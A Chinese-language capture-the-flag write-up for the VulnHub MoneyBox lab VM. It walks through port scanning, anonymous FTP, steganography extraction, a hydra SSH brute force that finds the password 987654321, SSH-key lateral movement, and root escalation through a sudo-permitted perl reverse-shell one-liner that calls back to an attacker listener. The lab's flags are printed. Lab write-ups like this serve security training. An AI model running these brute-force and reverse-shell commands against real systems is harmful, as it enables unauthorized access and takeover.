VulnHub-MoneyBox

总字符数: 15.69K

代码: 12.79K, 文本: 0.79K

预计阅读时间: 59 分钟

Overview

Name	Template
Release Date	2024-11-08
Write-up Author	kill3r
Machine Author	kill3r
Difficulty	Easy
User Flag
Root Flag
Link	https://www.vulnhub.com/entry/moneybox-1,653/

薄弱点

图片隐写

Nmap扫描

ports=$(nmap -p- --min-rate=1000 -T4 192.168.56.103 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
nmap -p$ports -sV -sC -O 192.168.56.103 -oN nmap.txt
# 第一行代码使用nmap命令扫描本地主机的所有端口（从1到65535），--min-rate=1000参数表示每秒发送最少1000个包，-T4参数表示设置扫描速度为快速扫描模式。
# grep -oE '(^[0-9][^/tcp]*)'用于提取输出结果中的端口号，tr '\n' ','用于将提取的端口号按逗号分隔并拼接成一个字符串。
# 第二行代码使用nmap命令再次扫描指定的端口，-p$ports参数表示扫描之前提取的端口列表，-sV参数表示进行服务版本检测，-sC参数表示在扫描过程中使用默认脚本进行常见漏洞探测，-O参数表示进行操作系统版本检测，-oN nmap.txt参数表示将扫描结果保存到名为nmap.txt的文件中。

┌──(root㉿kill3r)-[/home/kill3r]
└─# ports=$(nmap -p- --min-rate=1000 -T4 192.168.56.103 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')                                                
┌──(root㉿kill3r)-[/home/kill3r]
└─# nmap -p$ports -sV -sC -O 192.168.56.103 -oN nmap.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-08 10:02 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.103
Host is up (0.00050s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.56.102
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0         1093656 Feb 26  2021 trytofind.jpg       
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 1e:30:ce:72:81:e0:a2:3d:5c:28:88:8b:12:ac:fa:ac (RSA)
|   256 01:9d:fa:fb:f2:06:37:c0:12:fc:01:8b:24:8f:53:ae (ECDSA)
|_  256 2f:34:b3:d0:74:b4:7f:8d:17:d2:37:b1:2e:32:f7:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: MoneyBox
MAC Address: 08:00:27:94:02:31 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.86 seconds

枚举

SMB 枚举

Port: 139 389 445 636

enum4linux -a/-A 127.0.0.1

1	$ enum4linux -A <ip>

MSF-SMB

# 基于SMB协议扫描版本号
msf6 > use auxiliary/scanner/smb/smb_version
# 扫描共享文件
msf6 > use auxiliary/scanner/smb/smb_enumshares
# 基于SMB进行用户信息枚举
msf6 > use auxiliary/scanner/smb/smb_lookupsid

Web

HTTP Web Server, Port Like: 80 443 81 8080 8443 4443 8081

Finger:获取有关特定用户或系统上的用户列表和配置信息

`whatweb`

# 用于识别和分析目标网站的技术栈、CMS（内容管理系统）、插件、框架和其他与网站相关的信息。通过分析网站的响应和页面内容
┌──(root㉿kill3r)-[~]
└─# whatweb 192.168.56.103
http://192.168.56.100 [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.46 (Debian)], IP[192.168.56.100], Script[text/javascript]

dirb http://192.168.56.100

dirsearch -u http://192.168.56.100 -r

gobuster dir -w ... -u http://192.168.56.100 -x html,php,js,bak

┌──(root㉿kill3r)-[/home/kill3r]
└─# gobuster dir -u "192.168.56.103" -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.103
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/blogs                (Status: 301) [Size: 316] [--> http://192.168.56.103/blogs/]
Progress: 37067 / 220561 (16.81%)
Progress: 47178 / 220561 (21.39%)

/server-status        (Status: 403) [Size: 279]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

漏洞扫描

1 2	$ nikto -h http://www.example.com/ $ nuclei -u https://example.com/

wordlist

pass.list

1	3xtr4ctd4t4

user.list

1
2

renu
lily

复现过程

Ftp

通过nmap扫描得知ftp可以匿名用户登录,用户名密码都是anonymous或者空

发现一张图片进行下载get trytofind.jpg

没发现什么问题,那就转战CTF的思路,看一下是否有隐写

steghide version 0.5.1

第一个参数必须是以下之一：
embed，--embed          嵌入数据
extract，--extract      提取数据
info，--info            显示有关覆盖文件或隐写文件的信息
info <filename>       显示有关<filename>的信息
encinfo，--encinfo      显示支持的加密算法列表
version，--version      显示版本信息
license，--license      显示steghide的许可证
help，--help            显示使用信息

嵌入选项：
-ef，--embedfile        选择要嵌入的文件
-ef <filename>        嵌入文件<filename>
-cf，--coverfile        选择覆盖文件
-cf <filename>        嵌入到文件<filename>
-p，--passphrase        指定密码短语
-p <passphrase>       使用<passphrase>嵌入数据
-sf，--stegofile        选择隐写文件
-sf <filename>        将结果写入<filename>而不是覆盖文件
-e，--encryption        选择加密参数
-e <a>[<m>]|<m>[<a>]  指定加密算法和/或模式
-e none               在嵌入之前不加密数据
-z，--compress          在嵌入之前压缩数据（默认）
-z <l>                 使用级别<l>（1最快速度... 9最佳压缩）
-Z，--dontcompress      在嵌入之前不压缩数据
-K，--nochecksum        不嵌入嵌入数据的crc32校验和
-N，--dontembedname     不嵌入原始文件的名称
-f，--force             覆盖现有文件
-q，--quiet             阻止显示信息消息
-v，--verbose           显示详细信息

提取选项：
-sf，--stegofile        选择隐写文件
-sf <filename>        从<filename>提取数据
-p，--passphrase        指定密码短语
-p <passphrase>       使用<passphrase>提取数据
-xf，--extractfile      选择提取数据的文件名
-xf <filename>        将提取的数据写入<filename>
-f，--force             覆盖现有文件
-q，--quiet             阻止显示信息消息
-v，--verbose           显示详细信息

info命令的选项：
-p，--passphrase        指定密码短语
-p <passphrase>       使用<passphrase>获取嵌入数据的信息

将emb.txt嵌入到cvr.jpg中：steghide embed -cf cvr.jpg -ef emb.txt
从stg.jpg中提取嵌入的数据：steghide extract -sf stg.jpg

1
2
3

┌──(root㉿kill3r)-[/home/kill3r]
└─# steghide extract -sf trytofind.jpg
# 需要密码,路走不通了,看看其他端口

通过拿到的密码进行提取数据

发现一个用户叫做renu提示是你的密码大概是一个弱密码请你更改并重视一下.我们可以爆破一下

SSH

┌──(root㉿kill3r)-[/home/kill3r]
└─# hydra -l renu -P /opt/pwcrack/PasswordDic/用户名和密码/密码/rockyou.txt 192.168.56.103 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-08 10:33:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344401 login tries (l:1/p:14344401), ~896526 tries per task
[DATA] attacking ssh://192.168.56.103:22/
[22][ssh] host: 192.168.56.103   login: renu   password: 987654321
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-08 10:34:20

密码爆破成功,ssh登录一下,登陆成功后信息收集一波

renu@MoneyBox:~$ id
uid=1001(renu) gid=1001(renu) groups=1001(renu)

renu@MoneyBox:~$ grep -E '/bin/bash$' /etc/passwd
root:x:0:0:root:/root:/bin/bash
lily:x:1000:1000:lily,,,:/home/lily:/bin/bash
renu:x:1001:1001::/home/renu:/bin/bash
# 发现一个lily用户,但是不知道密码,就暂且放过

renu@MoneyBox:~$ ls
# 发现了user1.txt
Yes...!
You Got it User1 Flag

 ==> us3r1{F14g:0ku74tbd3777y4}
# 继续分析用户的历史命令
renu@MoneyBox:~$ history
    1  cler
    2  ls
    3  ls -la
    4  cd /home
    5  ls
    6  clear
    7  cd
    8  ls
    9  ls -la
   10  exit
   11  clear
   12  ls
   13  ls -la
   14  cd /home
   15  ls
   16  cd lily
   17  ls
   18  ls -la
   19  clear
   20  cd
   21  clear
   22  ssh-keygen -t rsa  # 生成了一个rsa密钥
   23  clear
   24  cd .ssh
   25  ls
   26  ssh-copy-id lily@192.168.43.80   # 把这个密钥拷贝给力lily用户,刚好我们机器当前也有lily用户后面可以确定一下
   27  clear
   28  cd
   29  cd -
   30  ls -l
   31  chmod 400 id_rsa
   32  ls -l
   33  ssh -i id_rsa lily@192.168.43.80
   34  clear
   35  ssh -i id_rsa lily@192.168.43.80  # 使用密钥文件登录到lily用户
   36  cd
   37  clear
   38  cd .ssh/
   39  ls
   40  ssh -i id_rsa lily@192.168.43.80
   41  su lily   # 切换到lily用户
   42  clear
   43  cd
   44  sudo apt install openssh
   45  sudo apt update
   46  sudo apt install openssh-server  # 安装openssh服务端
   47  sudo service ssh start
   48  sudo service ssh status
   49  clear
   50  cd /etc/
   51  ls
   52  cd ssh
   53  ls
   54  nano ssh_config
   55  ls
   56  nano sshd_config
   57  clear
   58  cd
   59  ls
   60  ls -la
   61  chsh bash
   62  chsh
   63  clear
   64  su root
   65  clear
   66  sudo apt install openssh
   67  su root
   68  exit

正常情况下,我们当前用户家目录应该有.ssh文件夹,并且有id_rsa.pub文件

没有问题,在去确认lily的家目录中的.ssh文件夹中是否存在authorized_keys文件,并且此文件中的内容如果是renu的密钥,那么证明我们可以通过密钥 ssh lily@127.0.0.1登录到lily用户

内容一样,尝试登录

renu@MoneyBox:/home/lily/.ssh$ ssh lily@127.0.0.1
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:8GzSoXjLv35yJ7cQf1EE0rFBb9kLK/K1hAjzK/IXk8I.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 26 09:07:47 2021 from 192.168.43.80
lily@MoneyBox:~$

继续信息收集

lily@MoneyBox:~$ ls
user2.txt
lily@MoneyBox:~$ cat user2.txt 
Yeah.....
You Got a User2 Flag

==> us3r{F14g:tr5827r5wu6nklao}
# 查看权限
lily@MoneyBox:~$ id
uid=1000(lily) gid=1000(lily) groups=1000(lily),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

# 查看历史命令
lily@MoneyBox:~$ history 
    1  whoami
    2  exit
    3  sudo -l
    4  clear
    5  find / -type f -user lily -perm 4000
    6  find / -type f -user lily -perm 4000 2>/dev/null
    7  find / -type f -user root -perm 4000 2>/dev/null
    8  exit
    9  find / -type f -user root -perm 4000 2>/dev/null
   10  find / -type f -user lily -perm 4000 2>/dev/null
   11  find / -type f -user lily -perm 4000
   12  clear
   13  find / -type f -user lily -perm 4000 2>/dev/null
   14  exit
   15  find / -type f -user lily -perm 4000 2>/dev/null
   16  find / -type f -root lily -perm 4000 2>/dev/null
   17  sudo -l
   18  clear
   19  exit
   20  sudo -l
   21  clear
   22  exit
   23  cd
   24  clear
   25  su renu
   26  clear
   27  cd /usr/bin/
   28  ls
   29  ls ping
   30  ls -l ping
   31  chmod u+s ping
   32  chmod -u+s ping
   33  ls -l ping
   34  sudo chmod -u+s ping
   35  ls -l ping
   36  sudo chmod u+r ping
   37  sudo chmod u+w ping
   38  ls -l ping
   39  sudo chmod g-s ping
   40  ls -l ping
   41  apt update
   42  sudo apt update
   43  ls
   44  ls -l whoami
   45  sudo chmod 400 ping
   46  sudo chmod u+x ping
   47  ls -l ping
   48  clear
   49  cd
   50  cd /etc/
   51  nano sudoers
   52  sudo nano sudoers
   53  cd /usr/bin
   54  ls nano
   55  ls more
   56  clear
   57  cd /etc/
   58  sudo nano sudoers
   59  su root
   60  ls
   61  ls -la
   62  clear
   63  ls -la
   64  nano user2.txt
   65  ls
   66  cat user2.txt
   67  exit
# 发现了他执行了suid,所以可能存在suid提权
lily@MoneyBox:~$ sudo -l
Matching Defaults entries for lily on MoneyBox:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lily may run the following commands on MoneyBox:
    (ALL : ALL) NOPASSWD: /usr/bin/perl
# 发现了perl是root权限,并且perl可以反弹Shell
# kali监听
┌──(root㉿kill3r)-[/home/kill3r]
└─# nc -lvvp 6666        
listening on [any] 6666 ...
# 使用sudo执行perl
lily@MoneyBox:~$ sudo /usr/bin/perl -e 'use Socket;$i="192.168.56.102";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'

lily@MoneyBox:~$ id
# 已经获取到了root权限
# 查看是否存在python,换到全交互式Shell

# which python
# which python3
/usr/bin/python3
#存在python3
# python3 -c 'import pty;pty.spawn("/bin/bash")';
root@MoneyBox:/home/lily# ls
ls
user2.txt
root@MoneyBox:/home/lily# cd /root
cd /root
root@MoneyBox:~# ls -a
.  ..  .bash_history  .bashrc  .local  .profile  .root.txt
root@MoneyBox:~# cat .root.txt
cat .root.txt

Congratulations.......!

You Successfully completed MoneyBox

Finally The Root Flag
    ==> r00t{H4ckth3p14n3t}

I'm Kirthik-KarvendhanT
    It's My First CTF Box

instagram : ____kirthik____

See You Back....

root@MoneyBox:~# history

Web

访问靶场,寻找功能点

源代码没有什么的信息,只是提示这是一个非常简单靶场,进行目录扫描一波吧

发现了blogs目录,访问一下,看一下源代码并且继续扫一下目录

目录扫描没有任何结果,查看源代码发现了一句注释:!--the hint is the another secret directory is S3cr3t-T3xt-->

提示了一个目录叫S3cr3t-T3xt,访问一下看一看

发现一个Key,这个Key可能是刚刚图片隐写提取数据的密码

Shell as user1

renu@MoneyBox:~$ cat user1.txt 
Yes...!
You Got it User1 Flag

 ==> us3r1{F14g:0ku74tbd3777y4}

Shell as user2

lily@MoneyBox:~$ cat user2.txt 
Yeah.....
You Got a User2 Flag

==> us3r{F14g:tr5827r5wu6nklao}

以root身份进入Shell

保存屏幕截图作为Flag或Proof

root@MoneyBox:~# cat .root.txt
cat .root.txt

Congratulations.......!

You Successfully completed MoneyBox

Finally The Root Flag
    ==> r00t{H4ckth3p14n3t}

I'm Kirthik-KarvendhanT
    It's My First CTF Box

instagram : ____kirthik____

See You Back....

本文由 kill3r 原创,采用署名-非商业性使用-相同方式共享 4.0 国际许可协议，转载请注明出处。